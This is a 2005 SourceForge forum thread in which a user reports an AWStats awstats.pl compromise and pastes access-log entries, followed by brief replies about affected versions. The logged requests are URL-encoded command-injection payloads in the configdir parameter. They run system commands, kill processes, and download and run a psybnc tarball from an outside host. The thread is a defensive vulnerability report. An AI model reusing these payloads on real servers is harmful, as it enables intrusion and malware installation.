Learn how easy it is to sync an existing GitHub or Google Code repo to a SourceForge project! See Demo

Close

RE: Security Vulnerability Awstats v6.xx

Developers
2005-05-17
2012-10-11
  • User has hacked and run code on my machine via this code.

    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:03:39 +1000] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bid%3becho%20e_exp%3
    b%2500 HTTP/1.1" 500 607
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:03:55 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bid%3becho%20e_exp%3
    b%2500 HTTP/1.1" 200 540
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:04:02 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bps%20aux%3becho%20e
    _exp%3b%2500 HTTP/1.1" 200 13548
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:04:43 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bkillall%20%2d9%20Fa
    hCore_65%2eex%3becho%20e_exp%3b%2500 HTTP/1.1" 200 523
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:05:11 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bkillall%20%2d9%20fo
    ld%3becho%20e_exp%3b%2500 HTTP/1.1" 200 514
    sls-ce7p10.dca2.superb.net - - [17/May/2005:18:06:02 +1000] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%
    20jajales%2ehome%2ero%2fbsdbnc%2etar%2egz%3btar%20xzvf%20bsdbnc%2etar%2egz%3bcd%20psybnc%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 7
    092

     
    • found this code is able to excecute arbitary code in yoru /tmp folder with default settings.

       
    • updating to 6.4 and awaiting reply can someone email me if this is still a problem in the 6.4 released port on FreeBSD 5.2.1

       
    • can confirm version is 6.0 in the original vulnerability

       
    • mark
      mark
      2005-08-19

      Why u dont set a permission you for you to this pl ?